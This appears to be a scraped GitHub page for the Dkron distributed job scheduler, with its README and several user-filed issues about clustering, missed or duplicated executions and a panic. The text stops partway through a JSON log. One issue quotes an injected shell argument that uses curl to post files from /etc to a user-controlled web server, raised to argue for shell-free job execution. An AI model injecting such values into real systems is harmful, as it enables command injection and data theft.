distribworks / dkron Goto Github PK

Dkron - Distributed, fault tolerant job scheduling system https://dkron.io

License: GNU Lesser General Public License v3.0

Makefile 0.58% Go 69.13% Shell 0.67% HTML 2.00% JavaScript 15.46% CSS 0.86% Dockerfile 0.05% SCSS 2.41% TypeScript 8.42% Jinja 0.41%

scheduled-jobs fault-tolerance cron distributed-systems

dkron's Introduction

Dkron - Distributed, fault tolerant job scheduling system for cloud native environments

Website: http://dkron.io/

Dkron is a distributed cron service, easy to setup and fault tolerant with focus in:

Easy: Easy to use with a great UI
Reliable: Completely fault tolerant
Highly scalable: Able to handle high volumes of scheduled jobs and thousands of nodes

Dkron is written in Go and leverage the power of the Raft protocol and Serf for providing fault tolerance, reliability and scalability while keeping simple and easily installable.

Dkron is inspired by the google whitepaper Reliable Cron across the Planet and by Airbnb Chronos borrowing the same features from it.

Dkron runs on Linux, OSX and Windows. It can be used to run scheduled commands on a server cluster using any combination of servers for each job. It has no single points of failure due to the use of the Gossip protocol and fault tolerant distributed databases.

You can use Dkron to run the most important part of your company, scheduled jobs.

Installation

Installation instructions

Full, comprehensive documentation is viewable on the Dkron website

Development Quick start

The best way to test and develop dkron is using docker, you will need Docker installed before proceeding.

Clone the repository.

Next, run the included Docker Compose config:

docker-compose up

This will start Dkron instances. To add more Dkron instances to the clusters:

docker-compose up --scale dkron-server=4
docker-compose up --scale dkron-agent=10

Check the port mapping using docker-compose ps and use the browser to navigate to the Dkron dashboard using one of the ports mapped by compose.

To add jobs to the system read the API docs.

Frontend development

Dkron dashboard is built using React Admin as a single page application.

To start developing the dashboard enter the ui directory and run npm install to get the frontend dependencies and then start the local server with npm start it should start a new local web server and open a new browser window serving de web ui.

Make your changes to the code, then run make ui to generate assets files. This is a method of embedding resources in Go applications.

Resources

Chef cookbook https://supermarket.chef.io/cookbooks/dkron

Python Client Library https://github.com/oldmantaiter/pydkron

Ruby client https://github.com/jobandtalent/dkron-rb

PHP client https://github.com/gromo/dkron-php-adapter

Terraform provider https://github.com/bozerkins/terraform-provider-dkron

Manage and run jobs in Dkron from your django project https://github.com/surface-security/django-dkron

Contributors

Made with contrib.rocks.

Get in touch

Twitter: @distribworks
Chat: https://gitter.im/distribworks/dkron
Email: victor at distrib.works

dkron's People

Contributors

Stargazers

Watchers

Forkers

pawl-rs forthewynne beetaa rohitpaulk step1profit learn-go nivertech sandeepone cinderalla oldmantaiter yongtin dongzerun shenjinxi cautonwong gunsluo sebastianmarkow bukalov whizz naxhh thinkhy 40a intfrr arindamnayak conkeyn krisnova neven7 bveliqi aromm se77en sercand wqx081 johannagnarsson igool ywshz kevana stephenranjit rainslytherin sdedelbrock d33d33 ycaihua etsangsplk goudgoud tomzhang firstway giovannialbero1992 eyjafjallajokull cn27001 zhangmuxi trendsoa linearregression adiene fengzhulei leoleovich armeo kumarsiva07 rssllyn hz89 didiercrunch realliusha lubaoyilang parasitew dagoonline webmi rowhit rdhammond hectorperez notatent ti luhhujbb mitsakim leeonvector mgmonteleone linkfluence optionalg cloudxtreme tnucera sparknetworks antvale sensetif bossjones sysadmind johnnyjian fe1t hopkings2008 pnlarsson koolay blake-education ossystems oopsoutofmemory yuhui-lin blessswei kofre wjmboss firelighttechnologies jmesquita abhipranay kozipiotr kevynhale kimlood chanyk-joseph

dkron's Issues

Config file not being loaded

Downloaded the latest release for osx, running ./dkron agent inside unzipped folder doesn't seem to read in config file.

Allow jobs to run without a shell

Currently, dkron runs all jobs in a shell. This is fine in a trusted environment, however, when allowing users to define the commands that are executed, this becomes dangerous.

Our use case is the following: We're allowing our users to provide arguments for cron jobs that all run our own CLI tool. Right now, users could provide arguments like "$(curl -XPOST -d@/etc/... http://their-own-webserver.com)" which dkron would pass to /bin/sh which in turn would execute the curl command.

In order to prevent such exploits, we would like to be able to configure whether a jobs command should be run in a shell or not.

What do you think about this functionality?

cc @mlafeldt @Luzifer

Cluster missing executions

As an administrator of a dkron cluster I want my users to have a reliable cron system which guarantees "at least once" execution of their cron tasks.

My setup:

3 AWS EC2s running CoreOS stable, all three machines being part of an etcd cluster, all three machines running dkron 0.6.3 as a cluster. All machines does have role: executor tag and the following cron:

{
    "name": "date",
    "schedule": "0 */5 * * * *",
    "command": "/usr/bin/date",
    "owner": "Knut Ahlers",
    "owner_email": "knut****.com",
    "run_as_user": "core",
    "success_count": 58,
    "error_count": 0,
    "last_success": "2016-02-05T10:45:00.00621402Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": {
        "role": "executor:1"
    }
}

Expected result:

The cron is executed every 5 minutes and will succeed every single time as it just calls /usr/bin/date (which is the location of the date utility on CoreOS).

Observed result:

The task is sent to one of the machines every 5 minutes and gets eventually executed. The cron is missing several executions having no end date, no running date utility on the machine and a failed state.

Question

Can you help me with this / tell me what I'm doing wrong? Is there anything I can do to prevent this?

Leader election issues when upgrading from 0.6.3 to 0.7.0

Apparently, the leader election process has changed and the backend storage format has too. When upgrading existing cluster, the cluster will not recover from this by itself. The leader key must be deleted manually from backend storage (in my case consul). After that, the leader election happens and all is well. Maybe the cluster could recognize, that the leader data is in old format and delete it by itself?

Panic when running job

Hi,

we're currently experiencing a panic when manually running a job:

2016/04/26 16:11:13 http: panic serving 10.8.1.217:62544: runtime error: invalid memory address or nil pointer dereference
goroutine 622306 [running]:
net/http.(*conn).serve.func1(0xc8205866e0, 0x7f90b738adc0, 0xc820022168)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1287 +0xb5
github.com/victorcoder/dkron/vendor/github.com/hashicorp/serf/serf.(*QueryResponse).Close(0x0)
/Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/hashicorp/serf/serf/query.go:117 +0xe7
github.com/victorcoder/dkron/dkron.(*AgentCommand).RunQuery(0xc820122120, 0xc820206f00)
/Users/victorcoder/src/github.com/victorcoder/dkron/dkron/agent.go:723 +0xe49
github.com/victorcoder/dkron/dkron.(*AgentCommand).jobRunHandler(0xc820122120, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/dkron/api.go:213 +0x2e7
github.com/victorcoder/dkron/dkron.(*AgentCommand).(github.com/victorcoder/dkron/dkron.jobRunHandler)-fm(0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/dkron/api.go:63 +0x3e
net/http.HandlerFunc.ServeHTTP(0xc82020b600, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
github.com/victorcoder/dkron/vendor/github.com/gorilla/mux.(*Router).ServeHTTP(0xc82000cd70, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/gorilla/mux/mux.go:98 +0x29e
github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose.(*Middleware).UseHandler.func1.1(0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose/interpose.go:55 +0x69
net/http.HandlerFunc.ServeHTTP(0xc8200f2150, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
github.com/victorcoder/dkron/dkron.metaMiddleware.func1.1(0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/dkron/api.go:78 +0x1ac
net/http.HandlerFunc.ServeHTTP(0xc8200f2180, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose.(*Middleware).ServeHTTP(0xc820210fa0, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose/interpose.go:85 +0x6c
net/http.serverHandler.ServeHTTP(0xc820015e60, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1862 +0x19e
net/http.(*conn).serve(0xc8205866e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1361 +0xbee
created by net/http.(*Server).Serve
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1910 +0x3f6

I've tracked the error down to these lines of code: (link)

    qr, err := a.serf.Query(QueryRunJob, exJson, params)
    if err != nil {
        log.WithFields(logrus.Fields{
            "query": QueryRunJob,
            "error": err,
        }).Debug("agent: Sending query error")
    }
    defer qr.Close()

From my perspective, the error is not being handled properly. The qr.Close is then called on nil which breaks somewhere in serf.

Consul - How to specify an ACL token?

(there was previously a bunch of text here; I'm throwing it out since I know the issue.)

How does one go about specifying an ACL token to use for Consul? My whole set up is locked down via tokens, but it seems like in the current from, to get dkron to work with Consul, I'd have to add a write permission to the anonymous token. Is there a way around that?

Specifying executing node count does not work

I am creating a simple example job, that I want to run only on one server in the cluster every five seconds:

Job definition:

{
    "name": "uptimesingle",
    "schedule": "*/5 * * * * *",
    "command": "uptime",
    "tags": {
        "role": "nrh_dkron_server:1"
    }
}

Three servers have the corresponding role tag. The first execution happens on only one server, but all subsequent executions happen on all the servers:

[{
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:35.003082159+01:00",
    "finished_at": "2015-12-17T10:47:35.021981973+01:00",
    "success": true,
    "output": "IDEwOjQ3OjM1IHVwIDQ2OCBkYXlzLCA0MiBtaW4sICA1IHVzZXJzLCAgbG9hZCBhdmVyYWdlOiAwLjg3LCAwLjc4LCAwLjczCg==",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450345655000284700,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:40.001009965+01:00",
    "finished_at": "2015-12-17T10:47:40.005702977+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQwIHVwIDQ2OCBkYXlzLCA0MiBtaW4sICA1IHVzZXJzLCAgbG9hZCBhdmVyYWdlOiAwLjg4LCAwLjc4LCAwLjczCg==",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450345660000339700,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:40.064416976+01:00",
    "finished_at": "2015-12-17T10:47:40.067118607+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQwIHVwIDEzMyBkYXlzLCAyMToyNiwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDAsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450345660000339700,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:40.06495417+01:00",
    "finished_at": "2015-12-17T10:47:40.069631854+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQwIHVwIDM3OCBkYXlzLCAxOTo1MSwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDMsIDAuMDMsIDAuMDAK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450345660000339700,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:45.000775552+01:00",
    "finished_at": "2015-12-17T10:47:45.004132583+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQ1IHVwIDQ2OCBkYXlzLCA0MiBtaW4sICA1IHVzZXJzLCAgbG9hZCBhdmVyYWdlOiAwLjg5LCAwLjc5LCAwLjczCg==",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450345665000309200,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:45.064704859+01:00",
    "finished_at": "2015-12-17T10:47:45.067112311+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQ1IHVwIDEzMyBkYXlzLCAyMToyNiwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDAsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450345665000309200,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:45.065110494+01:00",
    "finished_at": "2015-12-17T10:47:45.067889715+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQ1IHVwIDM3OCBkYXlzLCAxOTo1MSwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDIsIDAuMDMsIDAuMDAK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450345665000309200,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:50.002168058+01:00",
    "finished_at": "2015-12-17T10:47:50.00769461+01:00",
    "success": true,
    "output": "IDEwOjQ3OjUwIHVwIDQ2OCBkYXlzLCA0MiBtaW4sICA1IHVzZXJzLCAgbG9hZCBhdmVyYWdlOiAwLjkwLCAwLjc5LCAwLjc0Cg==",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450345670000230100,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:50.064456879+01:00",
    "finished_at": "2015-12-17T10:47:50.066860985+01:00",
    "success": true,
    "output": "IDEwOjQ3OjUwIHVwIDEzMyBkYXlzLCAyMToyNiwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDAsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450345670000230100,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:50.065033688+01:00",
    "finished_at": "2015-12-17T10:47:50.068118228+01:00",
    "success": true,
    "output": "IDEwOjQ3OjUwIHVwIDM3OCBkYXlzLCAxOTo1MSwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDIsIDAuMDMsIDAuMDAK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450345670000230100,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}]

Work together with kala?

Man, how I wish Kala and Dcron would just work together.

https://github.com/ajvb/kala

https://github.com/victorcoder/dcron

Fusing both would be AWESOME (I'd even like to help).

What Dcron gets right:

Distributed by design
Raft for the reliable parts, gossip for lightweight sync, a match made in heaven
Linux mentality
Dashboard included
Good docs, nice website, looks serious

What Kala gets right:

Built much more directly after Chronos, which has an amazing and battle tested API
Using ISO durations instead of NIHing their own format
Dependent jobs

A few questions regarding the inner working of dkron

I could not find the answer anywhere, so I hope this is the right place to ask:

Does Dkron waits for a job to end to get the result and total run time? How does Dkron know if a job is "failed" or "succeed"?
If any job runs longer than expected, does DKron starts the job again? For example if the previous batch is still running then does Dkron know it should wait?

Craft init recipes

For several systems

Remove all execution data when removing a job

When deleting a job all related executions must be removed also

Use the new etcd client

The current etcd client is being deprecated, the new client https://godoc.org/github.com/coreos/etcd/client will have all the focus in the future.

Executing deleted and changed jobs

Dkron keeps executing deleted jobs for some reason. I have started two jobs with a simple curl command and then deleted both jobs, but they still keep executing. I'm not getting the jobs if I list all jobs in dkron. I get these logs in dkron:

INFO[2016-03-02T11:12:00+01:00] agent: Starting job                           job=job1
INFO[2016-03-02T11:09:00+01:00] agent: Starting job                           job=job2
WARN[2016-03-02T11:09:03+01:00] rpc: Received execution done for a deleted job.
WARN[2016-03-02T11:09:03+01:00] rpc: Error calling ExecutionDone              error=rpc: Received execution done for a deleted job.
WARN[2016-03-02T11:09:03+01:00] rpc: Received execution done for a deleted job.
WARN[2016-03-02T11:09:03+01:00] rpc: Error calling ExecutionDone              error=rpc: Received execution done for a deleted job.

If I query the consul key value at /v1/kv/dcron/jobs/?recurse= it's also empty.

If I restart dkron it stops executing the deleted jobs, but it seems to keep the schedule in memory after deletion.

After some digging I realised this seems to be an general issues when you make changes to a job, so for example if a disable a job it does not disable the in memory schedule and keeps going. Even worse if I make multiple changes to a job it creates new schedules for each change but does not stop the old one, so you will have multiple parallel executions for a single schedule. If I update a job that runs every second 5 times it then runs 5 times a second.

I'm using a local consul version 0.6.3 with a single node, and dkron version 0.6.4. Both are running locally on OSX 10.10.2.

Is this a known issue, or am I missing something in the documentation?

Better documentation on install

It's not clear that a backend storage system is needed

Reload config

Reload config on runtime

How to configure a cluster

I have done it like this:
In one console:
$ ./etcd

And in another console
$ ./dkron agent -server -debug=true -backend-machine=127.0.0.1:2379

That is all ok, I can create jobs and run jobs. But when I try to join anther agent to this server to build a cluster, I don't know where it is wrong. Here is what I do:

I do the following steps on anoter machine:

 $ ./dkron agent -backend-machine=10.16.28.17:2379 -debug=true                                              
 Starting Dkron agent...
 INFO[2015-12-18T19:27:09+08:00] agent: Dkron agent starting                  
 INFO[2015-12-18T19:27:09+08:00] agent: joining: [127.0.0.1:5001 127.0.0.1:5002] replay: true 
 WARN[2015-12-18T19:27:09+08:00] agent: error joining: dial tcp 127.0.0.1:5002: getsockopt: connection refused 
 INFO[2015-12-18T19:27:09+08:00] agent: Listen for events                     
 DEBU[2015-12-18T19:27:10+08:00] agent: Received event                         event=member-join

It don't work. I try to set the 'join' parameter as following:

$ ./dkron agent -backend-machine=10.16.28.17:2379 -debug=true -join="10.16.28.17:5001"
Starting Dkron agent...
INFO[2015-12-18T19:29:33+08:00] agent: Dkron agent starting                  
INFO[2015-12-18T19:29:33+08:00] agent: joining: [127.0.0.1:5001 127.0.0.1:5002] replay: true 
WARN[2015-12-18T19:29:33+08:00] agent: error joining: dial tcp 127.0.0.1:5002: getsockopt: connection refused 
INFO[2015-12-18T19:29:33+08:00] agent: Listen for events                     
DEBU[2015-12-18T19:29:34+08:00] agent: Received event                         event=member-join

It don't work either.

Thanks a lot.

Check race conditions

Test suite executed with -race gives some warnings

One-off jobs

Feature idea: I have a use case, where I need to execute something sometime later, but just once and then the job should be deleted or archived. I would specify a date and time, when I want the job to run, with optional time window and dkron would make sure, the job will be run on the specified servers or just one of them within the given window. If the job succeeds, it would be deleted. If not, it will be retried n times in the given window, with exponential backoff, maybe. If at the end of the window it still did not run successfully, it would be deleted also, possibly triggering an alert.

delete localhost/8081/jobs/corn_job error

I see that file "api.go"
Method: jobDeleteHandler -> a.etcd.Client.Delete(job,false) no a.etcd.keyspace , so can't delete

i modify this method like this:
a.etcd.Client.Delete(a.etcd.keyspace+"/jobs/"+job,false)

then delete return ok

but my process "dkron2" terminated.

the console show "Key not found /dcron/jobs/corn_job" and "Terminating dkron2

Configurable log level

The log verbosity must be configurable

DKron Zookeeper Failover not working

When we use multiple backend-machine to provide multiple instances of Zookeeper nodes to startup DKron and then if the ZK node to which the dkron server is connected to dies, the DKron server also dies and does not failover to the other ZK nodes

Add Serf's -advertise option to Dkron's options

This is a result of #108. The -advertise option seems crucial in running Serf in containers across different hosts. Without it, the container will advertise the containers IP and not the host causing the node to fail.

#55 not fixed yet

Issue #55 was closed, but is not fixed yet, I think.

Unfortunately, it's still not working. I tried 0.6.1 and the behavior is the same.

Job definition:

{
    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 16,
    "error_count": 0,
    "last_success": "2015-12-21T10:05:00.083201311+01:00",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": {
        "role": "nrh_dkron_server:1"
    }
}

Executions:

[

{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:03:50.084912411+01:00",
    "finished_at": "2015-12-21T10:03:50.099487464+01:00",
    "success": true,
    "output": "IDEwOjAzOjUwIHVwIDM4MiBkYXlzLCAxOTowNywgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMjQsIDAuMjEsIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450688630000273965,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 0,
    "error_count": 0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:00.000599135+01:00",
    "finished_at": "2015-12-21T10:04:00.003453523+01:00",
    "success": true,
    "output": "IDEwOjA0OjAwIHVwIDQ3MSBkYXlzLCAyMzo1OSwgIDUgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuOTYsIDAuOTAsIDAuNzYK",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450688640000194942,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 0,
    "error_count": 0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:00.080118972+01:00",
    "finished_at": "2015-12-21T10:04:00.083194838+01:00",
    "success": true,
    "output": "IDEwOjA0OjAwIHVwIDEzNyBkYXlzLCAyMDo0MiwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDEsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450688640000194942,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 0,
    "error_count": 0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:00.080418988+01:00",
    "finished_at": "2015-12-21T10:04:00.08390867+01:00",
    "success": true,
    "output": "IDEwOjA0OjAwIHVwIDM4MiBkYXlzLCAxOTowOCwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMjAsIDAuMjAsIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450688640000194942,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 0,
    "error_count": 0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:10.000856912+01:00",
    "finished_at": "2015-12-21T10:04:10.004640213+01:00",
    "success": true,
    "output": "IDEwOjA0OjEwIHVwIDQ3MSBkYXlzLCAyMzo1OSwgIDUgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDEuMDQsIDAuOTIsIDAuNzcK",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450688650000365412,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 0,
    "error_count": 0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:10.079925794+01:00",
    "finished_at": "2015-12-21T10:04:10.083452121+01:00",
    "success": true,
    "output": "IDEwOjA0OjEwIHVwIDEzNyBkYXlzLCAyMDo0MywgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDEsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450688650000365412,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 0,
    "error_count": 0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:10.080275783+01:00",
    "finished_at": "2015-12-21T10:04:10.083116711+01:00",
    "success": true,
    "output": "IDEwOjA0OjEwIHVwIDM4MiBkYXlzLCAxOTowOCwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMTcsIDAuMTksIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450688650000365412,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 0,
    "error_count": 0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:20.000726205+01:00",
    "finished_at": "2015-12-21T10:04:20.003752703+01:00",
    "success": true,
    "output": "IDEwOjA0OjIwIHVwIDQ3MSBkYXlzLCAyMzo1OSwgIDUgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDEuMDMsIDAuOTIsIDAuNzcK",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450688660000278399,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 0,
    "error_count": 0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:20.07970281+01:00",
    "finished_at": "2015-12-21T10:04:20.084218902+01:00",
    "success": true,
